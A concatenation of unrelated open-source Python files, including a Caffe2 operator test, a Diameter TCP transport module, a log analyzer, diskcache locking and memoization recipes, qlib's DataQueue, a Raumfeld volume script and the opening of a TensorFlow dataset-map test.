D = np.zeros((first_dim,) + X.shape[1:])
op = core.CreateOperator("SparseToDense", ["I", "X", "D"], ["Y"])
def sparse_to_dense(I, X, D):
O = np.zeros(D.shape)
for i, p in enumerate(I):
O[p] += X[i]
return [O]
self.assertReferenceChecks(gc, op, [I, X, D], sparse_to_dense)
self.assertDeviceChecks(dc, op, [I, X, D], [0])
X = X.astype(np.float32)
self.assertGradientChecks(gc, op, [I, X, D], 1, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_dot_product(self, inputs, gc, dc):
X, Y = inputs
op = core.CreateOperator("DotProduct", ["X", "Y"], 'out')
def dotproduct(X, Y):
return (np.sum(X * Y, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
K=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_padding(self, N, M, K, pad_value, gc, dc):
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
pad_value=pad_value)
def dotproduct(X, Y):
Z = np.ones((N, max(M, K))).astype(np.float32) * pad_value
if M < K:
Z[:, :M] = X
return (np.sum(Z * Y, axis=1), )
else:
Z[:, :K] = Y
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10),
pad_value=st.floats(min_value=0.1, max_value=1.0),
**hu.gcs_cpu_only)
def test_dot_product_with_rep_padding(self, N, M, pad_value, gc, dc):
K = 2 * M
X = np.random.rand(N, M).astype(np.float32) - 0.5
Y = np.random.rand(N, K).astype(np.float32) - 0.5
op = core.CreateOperator("DotProductWithPadding", ["X", "Y"], 'out',
replicate=True,
pad_value=pad_value)
def dotproduct(X, Y):
import numpy.matlib as npm
if M < K:
Z = npm.repmat(X, 1, K // M)
return (np.sum(Z * Y, axis=1), )
else:
Z = npm.repmat(Y, 1, M // K)
return (np.sum(Z * X, axis=1), )
self.assertReferenceChecks(gc, op, [X, Y], dotproduct)
self.assertDeviceChecks(dc, op, [X, Y], [0])
self.assertGradientChecks(gc, op, [X, Y], 0, [0])
self.assertGradientChecks(gc, op, [X, Y], 1, [0])
@given(N=st.integers(min_value=2, max_value=10),
M=st.integers(min_value=2, max_value=10), **hu.gcs_cpu_only)
def test_ensure_dense(self, N, M, gc, dc):
# in place
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "X")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
# or not
X = np.random.rand(N, M).astype(np.float32) - 0.5
op = core.CreateOperator("EnsureDense", ["X"], "out")
self.assertReferenceChecks(gc, op, [X], lambda x: [x])
self.assertDeviceChecks(dc, op, [X], [0])
@given(N=st.integers(min_value=10, max_value=100),
M=st.integers(min_value=2, max_value=10),
num_buckets=st.integers(min_value=1, max_value=5),
**hu.gcs_cpu_only)
def test_accumulate_histogram_op(self, N, M, num_buckets, gc, dc):
X = np.random.rand(N, M).astype(np.float32)
lower_bound, upper_bound = 0.1, 0.9
op = core.CreateOperator("AccumulateHistogram", ["X"],
['cur_hist', 'acc_hist'],
lower_bound=lower_bound,
upper_bound=upper_bound,
num_buckets=num_buckets)
def histogram(X):
hist = np.zeros((num_buckets + 2, ), dtype=np.int32)
segment = (upper_bound - lower_bound) / num_buckets
Y = np.zeros((N, M), dtype=np.int32)
Y[X < lower_bound] = 0
Y[X >= upper_bound] = num_buckets + 1
Y[(X >= lower_bound) & (X < upper_bound)] = \
((X[(X >= lower_bound) & (X < upper_bound)] - lower_bound) /
segment + 1).astype(np.int32)
for i in range(Y.shape[0]):
for j in range(Y.shape[1]):
hist[Y[i][j]] += 1
cur_hist, acc_hist = hist, hist
return [cur_hist, acc_hist]
self.assertDeviceChecks(dc, op, [X], [0, 1])
self.assertReferenceChecks(gc, op, [X], histogram)
if __name__ == "__main__":
unittest.main()
|
transport.py
|
# -*- coding: utf-8 -*-
"""
bromelia.transport
~~~~~~~~~~~~~~~~~~
This module defines the TCP transport-layer connections that underlie
the Diameter application protocol.
:copyright: (c) 2020-present Henrique Marques Ribeiro.
:license: MIT, see LICENSE for more details.
"""
import copy
import logging
import random
import selectors
import socket
import threading
from .config import TRACKING_SOCKET_EVENTS_TIMEOUT
tcp_connection = logging.getLogger("TcpConnection")
tcp_client = logging.getLogger("TcpClient")
tcp_server = logging.getLogger("TcpServer")
class TcpConnection():
def __init__(self, ip_address, port):
self._recv_buffer = b""
self._send_buffer = b""
self.send_data_stream_queued = False
self.data_stream = b""
self._recv_data_stream = b""
self._recv_data_available = threading.Event()
self.write_mode_on = threading.Event()
self.read_mode_on = threading.Event()
self.lock = threading.Lock()
self.recv_data_consumed = False
self.ip_address = ip_address
self.port = port
self.sock = None
self.is_connected = False
self.sock_id = "".join(random.choice('0123456789ABCDEF') for i in range(16))
tcp_connection.debug(f"Creating Socket with ID {self.sock_id}")
self._stop_threads = False
self.selector = selectors.DefaultSelector()
self.tracking_events_count = 0
self.connection_attempts = 3
self.events_mask = selectors.EVENT_READ
def is_write_mode(self):
if self.events_mask & selectors.EVENT_WRITE:
return True
return False
def is_read_mode(self):
if self.events_mask & selectors.EVENT_READ:
return True
return False
def is_read_write_mode(self):
if self.events_mask & (selectors.EVENT_READ | selectors.EVENT_WRITE):
return True
return False
def close(self):
if not self.is_connected:
raise ConnectionError("There is no transport connection up for "\
"this PeerNode")
self.is_connected = False
try:
self.selector.unregister(self.sock)
tcp_connection.debug(f"[Socket-{self.sock_id}] De-registering "\
f"Socket from Selector address: "\
f"{self.selector.get_map()}")
self.sock.close()
tcp_connection.debug(f"[Socket-{self.sock_id}] Shutting "\
f"down Socket")
except KeyError as e:
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"such Selector registered")
self._stop_threads = True
def run(self):
if not self.is_connected:
raise ConnectionError(f"[Socket-{self.sock_id}] There is no "\
f"transport connection up for this Peer")
threading.Thread(name="transport_layer_bootstrapper",
target=self._run).start()
def _run(self):
while self.is_connected and not self._stop_threads:
self.events = self.selector.select(timeout=TRACKING_SOCKET_EVENTS_TIMEOUT)
self.tracking_events_count += TRACKING_SOCKET_EVENTS_TIMEOUT
for key, mask in self.events:
if key.data is not None:
self.data_stream += key.data
if mask & selectors.EVENT_WRITE:
tcp_connection.debug(f"Selector notified EVENT_WRITE")
self.write()
if mask & selectors.EVENT_READ:
tcp_connection.debug(f"Selector notified EVENT_READ")
self.read()
def _set_selector_events_mask(self, mode, msg=None):
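        # Switch the selector's interest set for this socket between READ, WRITE and
        # READ/WRITE, and flip the matching threading.Event flags so other threads
        # can tell which mode the connection is currently in.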
self.lock.acquire()
if mode == "r":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ]")
self.events_mask = selectors.EVENT_READ
self.selector.modify(self.sock, self.events_mask)
self.write_mode_on.clear()
self.read_mode_on.set()
elif mode == "w":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [WRITE]")
self.events_mask = selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.clear()
elif mode == "rw":
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask [READ/WRITE]")
self.events_mask = selectors.EVENT_READ | selectors.EVENT_WRITE
self.selector.modify(self.sock, self.events_mask, data=msg)
self.write_mode_on.set()
self.read_mode_on.set()
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Updating "\
f"selector events mask: Invalid entry")
self.lock.release()
def _write(self):
if self._send_buffer:
try:
sent = self.sock.send(self._send_buffer)
tcp_connection.debug(f"[Socket-{self.sock_id}] Just sent "\
f"{sent} bytes in _send_buffer")
except BlockingIOError:
tcp_connection.exception(f"[Socket-{self.sock_id}] An error "\
f"has occurred")
self._stop_threads = True
else:
self._send_buffer = self._send_buffer[sent:]
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data "\
f"has been sent")
def write(self):
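        # Move any pending application data into _send_buffer, flush it to the
        # socket, and fall back to read-only mode once everything queued has been sent.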
if not self.send_data_stream_queued and self.data_stream:
self._send_buffer += self.data_stream
self.data_stream = b""
self.send_data_stream_queued = True
tcp_connection.debug(f"[Socket-{self.sock_id}] Stream data has "\
f"been queued into _send_buffer: "\
f"{self._send_buffer.hex()}")
self._write()
if self.send_data_stream_queued and not self._send_buffer:
self._set_selector_events_mask("r")
self.send_data_stream_queued = False
tcp_connection.debug(f"[Socket-{self.sock_id}] There is no "\
f"data to be sent for a while")
def _read(self):
try:
data = self.sock.recv(4096*64)
tcp_connection.debug(f"[Socket-{self.sock_id}] Data received: "\
f"{data.hex()}")
        except Exception:
tcp_connection.exception(f"[Socket-{self.sock_id}] An Exception "\
f"has been raised")
self.error_has_raised = True
self._stop_threads = True
else:
if data:
self._recv_buffer += data
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer: "\
f"{self._recv_buffer.hex()}")
else:
tcp_connection.debug(f"[Socket-{self.sock_id}] Peer closed "\
f"connection")
self._stop_threads = True
def read(self):
self._read()
if self._recv_buffer:
self._recv_data_stream += copy.copy(self._recv_buffer)
self._recv_data_available.set()
self._recv_buffer = b""
tcp_connection.debug(f"[Socket-{self.sock_id}] _recv_buffer has "\
f"been cleaned up")
self._set_selector_events_mask("r")
def test_connection(self):
while True:
try:
self.sock.send(b"")
return True
except OSError as e:
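                # Winsock error 10057 (WSAENOTCONN) means the socket is not
                # connected, so give up instead of retrying.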
if e.args[0] == 10057:
                    self.connection_attempts -= 1
return False
class TcpClient(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_client.debug(f"[Socket-{self.sock_id}] Client-side Socket: "\
f"{self.sock}")
self.sock.setblocking(False)
tcp_client.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.sock.connect_ex((self.ip_address, self.port))
tcp_client.debug(f"[Socket-{self.sock_id}] Connecting to the "\
f"Remote Peer")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_client.debug(f"[Socket-{self.sock_id}] Registering Socket "\
f"Selector address: {self.selector.get_map()}")
except Exception as e:
tcp_client.exception(f"client_errors: {e.args}")
class TcpServer(TcpConnection):
def __init__(self, ip_address, port):
super().__init__(ip_address, port)
def start(self):
try:
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_connection.debug(f"[Socket-{self.sock_id}] Server-side "\
f"Socket: {self.server_sock}")
self.server_selector = selectors.DefaultSelector()
            self.server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_sock.bind((self.ip_address, self.port))
self.server_sock.listen()
tcp_server.debug(f"[Socket-{self.sock_id}] Listening on "\
f"{self.ip_address}:{self.port}")
self.server_sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] Setting as "\
f"Non-Blocking")
self.server_selector.register(self.server_sock, selectors.EVENT_READ | selectors.EVENT_WRITE)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"Socket into Selector address: "\
f"{self.server_selector.get_map()}")
except Exception as e:
tcp_server.exception(f"server_error: {e.args}")
def run(self):
events = self.server_selector.select(timeout=None)
for key, mask in events:
tcp_server.debug(f"[Socket-{self.sock_id}] Event has been "\
f"raised on Main Socket: (mask, key) = "\
f"({mask}, {key})")
if key.data is None:
self.sock, self.remote_address = self.server_sock.accept()
self.sock.setblocking(False)
tcp_server.debug(f"[Socket-{self.sock_id}] New Socket "\
f"bound to Main Socket: {self.sock}")
self.is_connected = True
self.selector.register(self.sock, selectors.EVENT_READ)
tcp_server.debug(f"[Socket-{self.sock_id}] Registering "\
f"New Socket into Selector address: "\
f"{self.selector.get_map()}")
super().run()
def close(self):
super().close()
try:
self.server_selector.unregister(self.server_sock)
tcp_server.debug(f"De-registering Main Socket from Selector "\
f"address: {self.server_selector.get_map()}")
self.server_sock.close()
tcp_server.debug("Shutting down Main Socket")
except KeyError:
tcp_server.debug("There is no such Selector registered")
|
analyzer_threading.py
|
import os
import re
import sys
import queue
import datetime
import threading
import requests
log_pattern = re.compile(r'(?P<ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}) .* .* \[(?P<time>.*)\] "(?P<method>\w+) (?P<url>[^\s]*) (?P<version>[\w|/\.\d]*)" (?P<status>\d{3}) (?P<length>\d+) "(?P<referer>[^\s]*)" "(?P<ua>.*)"')
event = threading.Event()
def read_log(q, path):
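    # Tail the log file: remember the read offset across iterations, start over from
    # the beginning if the file was truncated or rotated, and push every new line
    # onto the shared queue until the shutdown event is set.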
offset = 0
while not event.is_set():
with open(path) as f:
if offset > os.stat(path).st_size:
offset = 0
f.seek(offset)
for line in f:
q.put(line)
offset = f.tell()
event.wait(0.1)
def read_worker(q, path):
t = threading.Thread(target=read_log, name='read-{}'.format(path), args=(q, path), daemon=True)
t.start()
def parse(q):
    while not event.is_set():
        try:
            line = q.get(timeout=0.5)
        except queue.Empty:
            continue
        search = log_pattern.search(line.rstrip('\n'))
if search:
data = search.groupdict()
yield data
def agg(q, interval=10):
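    # Aggregate parsed records in windows of roughly `interval` seconds (request
    # count, total bytes, error rate) and push each window via send(), which writes
    # an InfluxDB-style line-protocol point.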
count = 0
traffic = 0
error = 0
start = datetime.datetime.now()
for item in parse(q):
print(item)
count += 1
traffic += int(item['length'])
if int(item['status']) >= 300:
error += 1
current = datetime.datetime.now()
if (current - start).total_seconds() >= interval:
error_rate = error / count
send(count, traffic, error_rate)
start = current
count = 0
traffic = 0
error = 0
def send(count, traffic, error_rate):
line = 'access_log count={},traffic={},error_rate={}'.format(count, traffic, error_rate)
res = requests.post('http://127.0.0.1:8086/write', data=line, params={'db': 'magedu'})
if res.status_code >= 300:
print(res.content)
def manager(*paths):
q = queue.Queue()
for path in paths:
read_worker(q, path)
agg(q, 10)
if __name__ == '__main__':
manager(*sys.argv[1:])
|
recipes.py
|
"""Disk Cache Recipes
"""
import functools
import math
import os
import random
import threading
import time
from .core import ENOVAL, args_to_key, full_name
class Averager(object):
"""Recipe for calculating a running average.
Sometimes known as "online statistics," the running average maintains the
total and count. The average can then be calculated at any time.
>>> import diskcache
>>> cache = diskcache.FanoutCache()
>>> ave = Averager(cache, 'latency')
>>> ave.add(0.080)
>>> ave.add(0.120)
>>> ave.get()
0.1
>>> ave.add(0.160)
>>> ave.pop()
0.12
>>> print(ave.get())
None
"""
def __init__(self, cache, key, expire=None, tag=None):
self._cache = cache
self._key = key
self._expire = expire
self._tag = tag
def add(self, value):
"Add `value` to average."
with self._cache.transact(retry=True):
total, count = self._cache.get(self._key, default=(0.0, 0))
total += value
count += 1
self._cache.set(
self._key, (total, count), expire=self._expire, tag=self._tag,
)
def get(self):
"Get current average or return `None` if count equals zero."
total, count = self._cache.get(self._key, default=(0.0, 0), retry=True)
return None if count == 0 else total / count
def pop(self):
"Return current average and delete key."
total, count = self._cache.pop(self._key, default=(0.0, 0), retry=True)
return None if count == 0 else total / count
class Lock(object):
"""Recipe for cross-process and cross-thread lock.
>>> import diskcache
>>> cache = diskcache.Cache()
>>> lock = Lock(cache, 'report-123')
>>> lock.acquire()
>>> lock.release()
>>> with lock:
... pass
"""
def __init__(self, cache, key, expire=None, tag=None):
self._cache = cache
self._key = key
self._expire = expire
self._tag = tag
def acquire(self):
"Acquire lock using spin-lock algorithm."
while True:
added = self._cache.add(
self._key,
None,
expire=self._expire,
tag=self._tag,
retry=True,
)
if added:
break
time.sleep(0.001)
def release(self):
"Release lock by deleting key."
self._cache.delete(self._key, retry=True)
def locked(self):
"Return true if the lock is acquired."
return self._key in self._cache
def __enter__(self):
self.acquire()
def __exit__(self, *exc_info):
self.release()
class RLock(object):
"""Recipe for cross-process and cross-thread re-entrant lock.
>>> import diskcache
>>> cache = diskcache.Cache()
>>> rlock = RLock(cache, 'user-123')
>>> rlock.acquire()
>>> rlock.acquire()
>>> rlock.release()
>>> with rlock:
... pass
>>> rlock.release()
>>> rlock.release()
Traceback (most recent call last):
...
AssertionError: cannot release un-acquired lock
"""
def __init__(self, cache, key, expire=None, tag=None):
self._cache = cache
self._key = key
self._expire = expire
self._tag = tag
def acquire(self):
"Acquire lock by incrementing count using spin-lock algorithm."
pid = os.getpid()
tid = threading.get_ident()
pid_tid = '{}-{}'.format(pid, tid)
while True:
with self._cache.transact(retry=True):
value, count = self._cache.get(self._key, default=(None, 0))
if pid_tid == value or count == 0:
self._cache.set(
self._key, (pid_tid, count + 1),
expire=self._expire, tag=self._tag,
)
return
time.sleep(0.001)
def release(self):
"Release lock by decrementing count."
pid = os.getpid()
tid = threading.get_ident()
pid_tid = '{}-{}'.format(pid, tid)
with self._cache.transact(retry=True):
value, count = self._cache.get(self._key, default=(None, 0))
is_owned = pid_tid == value and count > 0
assert is_owned, 'cannot release un-acquired lock'
self._cache.set(
self._key, (value, count - 1),
expire=self._expire, tag=self._tag,
)
def __enter__(self):
self.acquire()
def __exit__(self, *exc_info):
self.release()
class BoundedSemaphore(object):
"""Recipe for cross-process and cross-thread bounded semaphore.
>>> import diskcache
>>> cache = diskcache.Cache()
>>> semaphore = BoundedSemaphore(cache, 'max-cons', value=2)
>>> semaphore.acquire()
>>> semaphore.acquire()
>>> semaphore.release()
>>> with semaphore:
... pass
>>> semaphore.release()
>>> semaphore.release()
Traceback (most recent call last):
...
AssertionError: cannot release un-acquired semaphore
"""
def __init__(self, cache, key, value=1, expire=None, tag=None):
self._cache = cache
self._key = key
self._value = value
self._expire = expire
self._tag = tag
def acquire(self):
"Acquire semaphore by decrementing value using spin-lock algorithm."
while True:
with self._cache.transact(retry=True):
value = self._cache.get(self._key, default=self._value)
if value > 0:
self._cache.set(
self._key, value - 1,
expire=self._expire, tag=self._tag,
)
return
time.sleep(0.001)
def release(self):
"Release semaphore by incrementing value."
with self._cache.transact(retry=True):
value = self._cache.get(self._key, default=self._value)
assert self._value > value, 'cannot release un-acquired semaphore'
value += 1
self._cache.set(
self._key, value, expire=self._expire, tag=self._tag,
)
def __enter__(self):
self.acquire()
def __exit__(self, *exc_info):
self.release()
def throttle(cache, count, seconds, name=None, expire=None, tag=None,
time_func=time.time, sleep_func=time.sleep):
"""Decorator to throttle calls to function.
>>> import diskcache, time
>>> cache = diskcache.Cache()
>>> count = 0
>>> @throttle(cache, 2, 1) # 2 calls per 1 second
... def increment():
... global count
... count += 1
>>> start = time.time()
>>> while (time.time() - start) <= 2:
... increment()
>>> count in (6, 7) # 6 or 7 calls depending on CPU load
True
"""
def decorator(func):
rate = count / float(seconds)
key = full_name(func) if name is None else name
now = time_func()
cache.set(key, (now, count), expire=expire, tag=tag, retry=True)
@functools.wraps(func)
def wrapper(*args, **kwargs):
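            # Token-bucket style throttling: the stored tally is refilled at `rate`
            # tokens per second since the last call; a call either spends one token
            # immediately or sleeps until enough of a token has accumulated.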
while True:
with cache.transact(retry=True):
last, tally = cache.get(key)
now = time_func()
tally += (now - last) * rate
delay = 0
if tally > count:
cache.set(key, (now, count - 1), expire)
elif tally >= 1:
cache.set(key, (now, tally - 1), expire)
else:
delay = (1 - tally) / rate
if delay:
sleep_func(delay)
else:
break
return func(*args, **kwargs)
return wrapper
return decorator
def barrier(cache, lock_factory, name=None, expire=None, tag=None):
"""Barrier to calling decorated function.
Supports different kinds of locks: Lock, RLock, BoundedSemaphore.
>>> import diskcache, time
>>> cache = diskcache.Cache()
>>> @barrier(cache, Lock)
... def work(num):
... print('worker started')
... time.sleep(1)
... print('worker finished')
>>> import multiprocessing.pool
>>> pool = multiprocessing.pool.ThreadPool(2)
>>> _ = pool.map(work, range(2))
worker started
worker finished
worker started
worker finished
>>> pool.terminate()
"""
def decorator(func):
key = full_name(func) if name is None else name
lock = lock_factory(cache, key, expire=expire, tag=tag)
@functools.wraps(func)
def wrapper(*args, **kwargs):
with lock:
return func(*args, **kwargs)
return wrapper
return decorator
def memoize_stampede(cache, expire, name=None, typed=False, tag=None, beta=1):
"""Memoizing cache decorator with cache stampede protection.
Cache stampedes are a type of system overload that can occur when parallel
computing systems using memoization come under heavy load. This behaviour
is sometimes also called dog-piling, cache miss storm, cache choking, or
the thundering herd problem.
The memoization decorator implements cache stampede protection through
early recomputation. Early recomputation of function results will occur
probabilistically before expiration in a background thread of
execution. Early probabilistic recomputation is based on research by
Vattani, A.; Chierichetti, F.; Lowenstein, K. (2015), Optimal Probabilistic
Cache Stampede Prevention, VLDB, pp. 886-897, ISSN 2150-8097
If name is set to None (default), the callable name will be determined
automatically.
If typed is set to True, function arguments of different types will be
cached separately. For example, f(3) and f(3.0) will be treated as distinct
calls with distinct results.
The original underlying function is accessible through the `__wrapped__`
attribute. This is useful for introspection, for bypassing the cache, or
for rewrapping the function with a different cache.
>>> from diskcache import Cache
>>> cache = Cache()
>>> @memoize_stampede(cache, expire=1)
... def fib(number):
... if number == 0:
... return 0
... elif number == 1:
... return 1
... else:
... return fib(number - 1) + fib(number - 2)
>>> print(fib(100))
354224848179261915075
An additional `__cache_key__` attribute can be used to generate the cache
key used for the given arguments.
>>> key = fib.__cache_key__(100)
>>> del cache[key]
Remember to call memoize when decorating a callable. If you forget, then a
TypeError will occur.
:param cache: cache to store callable arguments and return values
:param float expire: seconds until arguments expire
:param str name: name given for callable (default None, automatic)
:param bool typed: cache different types separately (default False)
:param str tag: text to associate with arguments (default None)
:return: callable decorator
"""
# Caution: Nearly identical code exists in Cache.memoize
def decorator(func):
"Decorator created by memoize call for callable."
base = (full_name(func),) if name is None else (name,)
def timer(*args, **kwargs):
"Time execution of `func` and return result and time delta."
start = time.time()
result = func(*args, **kwargs)
delta = time.time() - start
return result, delta
@functools.wraps(func)
def wrapper(*args, **kwargs):
"Wrapper for callable to cache arguments and return values."
key = wrapper.__cache_key__(*args, **kwargs)
pair, expire_time = cache.get(
key, default=ENOVAL, expire_time=True, retry=True,
)
if pair is not ENOVAL:
result, delta = pair
now = time.time()
ttl = expire_time - now
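                # Probabilistic early recomputation ("x-fetch"): treat the value as
                # expired early with a probability that grows as the remaining TTL
                # shrinks relative to the original computation time `delta`.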
if (-delta * beta * math.log(random.random())) < ttl:
return result # Cache hit.
# Check whether a thread has started for early recomputation.
thread_key = key + (ENOVAL,)
thread_added = cache.add(
thread_key, None, expire=delta, retry=True,
)
if thread_added:
# Start thread for early recomputation.
def recompute():
with cache:
pair = timer(*args, **kwargs)
cache.set(
key, pair, expire=expire, tag=tag, retry=True,
)
thread = threading.Thread(target=recompute)
thread.daemon = True
thread.start()
return result
pair = timer(*args, **kwargs)
cache.set(key, pair, expire=expire, tag=tag, retry=True)
return pair[0]
def __cache_key__(*args, **kwargs):
"Make key for cache given function arguments."
return args_to_key(base, args, kwargs, typed)
wrapper.__cache_key__ = __cache_key__
return wrapper
return decorator
|
data_queue.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import os
import multiprocessing
import threading
import time
import warnings
from queue import Empty
from typing import TypeVar, Generic, Sequence, cast
from qlib.log import get_module_logger
_logger = get_module_logger(__name__)
T = TypeVar("T")
__all__ = ["DataQueue"]
class DataQueue(Generic[T]):
"""Main process (producer) produces data and stores them in a queue.
Sub-processes (consumers) can retrieve the data-points from the queue.
Data-points are generated via reading items from ``dataset``.
:class:`DataQueue` is ephemeral. You must create a new DataQueue
when the ``repeat`` is exhausted.
See the documents of :class:`qlib.rl.utils.FiniteVectorEnv` for more background.
Parameters
----------
dataset
The dataset to read data from. Must implement ``__len__`` and ``__getitem__``.
repeat
Iterate over the data-points for how many times. Use ``-1`` to iterate forever.
shuffle
If ``shuffle`` is true, the items will be read in random order.
producer_num_workers
Concurrent workers for data-loading.
queue_maxsize
Maximum items to put into queue before it jams.
Examples
--------
>>> data_queue = DataQueue(my_dataset)
>>> with data_queue:
... ...
In worker:
>>> for data in data_queue:
... print(data)
"""
def __init__(
self,
dataset: Sequence[T],
repeat: int = 1,
shuffle: bool = True,
producer_num_workers: int = 0,
queue_maxsize: int = 0,
):
if queue_maxsize == 0:
if os.cpu_count() is not None:
queue_maxsize = cast(int, os.cpu_count())
_logger.info(f"Automatically set data queue maxsize to {queue_maxsize} to avoid overwhelming.")
else:
queue_maxsize = 1
_logger.warning(f"CPU count not available. Setting queue maxsize to 1.")
self.dataset: Sequence[T] = dataset
self.repeat: int = repeat
self.shuffle: bool = shuffle
self.producer_num_workers: int = producer_num_workers
self._activated: bool = False
self._queue: multiprocessing.Queue = multiprocessing.Queue(maxsize=queue_maxsize)
self._done = multiprocessing.Value("i", 0)
def __enter__(self):
self.activate()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.cleanup()
def cleanup(self):
with self._done.get_lock():
self._done.value += 1
for repeat in range(500):
if repeat >= 1:
warnings.warn(f"After {repeat} cleanup, the queue is still not empty.", category=RuntimeWarning)
while not self._queue.empty():
try:
self._queue.get(block=False)
except Empty:
pass
# Sometimes when the queue gets emptied, more data have already been sent,
# and they are on the way into the queue.
# If these data didn't get consumed, it will jam the queue and make the process hang.
# We wait a second here for potential data arriving, and check again (for ``repeat`` times).
time.sleep(1.0)
if self._queue.empty():
break
_logger.debug(f"Remaining items in queue collection done. Empty: {self._queue.empty()}")
def get(self, block=True):
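        # The very first get() waits longer because the producer thread may still be
        # warming up; later polls use a short timeout so StopIteration is raised
        # promptly once the queue is marked done.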
if not hasattr(self, "_first_get"):
self._first_get = True
if self._first_get:
timeout = 5.0
self._first_get = False
else:
timeout = 0.5
while True:
try:
return self._queue.get(block=block, timeout=timeout)
except Empty:
if self._done.value:
raise StopIteration # pylint: disable=raise-missing-from
def put(self, obj, block=True, timeout=None):
return self._queue.put(obj, block=block, timeout=timeout)
def mark_as_done(self):
with self._done.get_lock():
self._done.value = 1
def done(self):
return self._done.value
def activate(self):
if self._activated:
raise ValueError("DataQueue can not activate twice.")
thread = threading.Thread(target=self._producer, daemon=True)
thread.start()
self._activated = True
return self
def __del__(self):
_logger.debug(f"__del__ of {__name__}.DataQueue")
self.cleanup()
def __iter__(self):
if not self._activated:
raise ValueError(
"Need to call activate() to launch a daemon worker " "to produce data into data queue before using it."
)
return self._consumer()
def _consumer(self):
while True:
try:
yield self.get()
except StopIteration:
_logger.debug("Data consumer timed-out from get.")
return
def _producer(self):
# pytorch dataloader is used here only because we need its sampler and multi-processing
from torch.utils.data import DataLoader, Dataset # pylint: disable=import-outside-toplevel
dataloader = DataLoader(
cast(Dataset[T], self.dataset),
batch_size=None,
num_workers=self.producer_num_workers,
shuffle=self.shuffle,
collate_fn=lambda t: t, # identity collate fn
)
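        # repeat == -1 means "iterate forever"; an effectively infinite bound keeps
        # the loop below simple.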
repeat = 10**18 if self.repeat == -1 else self.repeat
for _rep in range(repeat):
for data in dataloader:
if self._done.value:
# Already done.
return
self._queue.put(data)
_logger.debug(f"Dataloader loop done. Repeat {_rep}.")
self.mark_as_done()
|
fred.py
|
#!/usr/bin/env python3
import threading
from time import sleep
from pyfeld.upnpCommand import UpnpCommand
from pyfeld.rfcmd import RfCmd
def handle_volume(roomName, value):
zoneIndex = RfCmd.get_room_zone_index(roomName)
print("Room found in zone ", zoneIndex)
if zoneIndex == -1:
print("ERROR: room with name '{0}' not found".format(roomName))
print("Available rooms are to be found here:\n" + RfCmd.get_info(False))
return
if RfCmd.is_unassigned_room(roomName):
print('error: room is unassigned: ' + roomName)
return
uc = UpnpCommand(RfCmd.rfConfig['zones'][zoneIndex]['host'])
udn = RfCmd.get_room_udn(roomName)
result = uc.set_room_volume(udn, value)
return result
uc = UpnpCommand(RfCmd.rfConfig['zones'][0]['host'])
def scan_raumfeld():
    while True:
print("discovery")
RfCmd.discover()
print("done")
sleep(120)
if __name__ == "__main__":
RfCmd.discover()
threading.Thread(target=scan_raumfeld).start()
for i in range(20):
handle_volume('one-s-serial', 20-i)
sleep(1)
|
map_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.map()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import threading
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.experimental.ops import threading_options
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
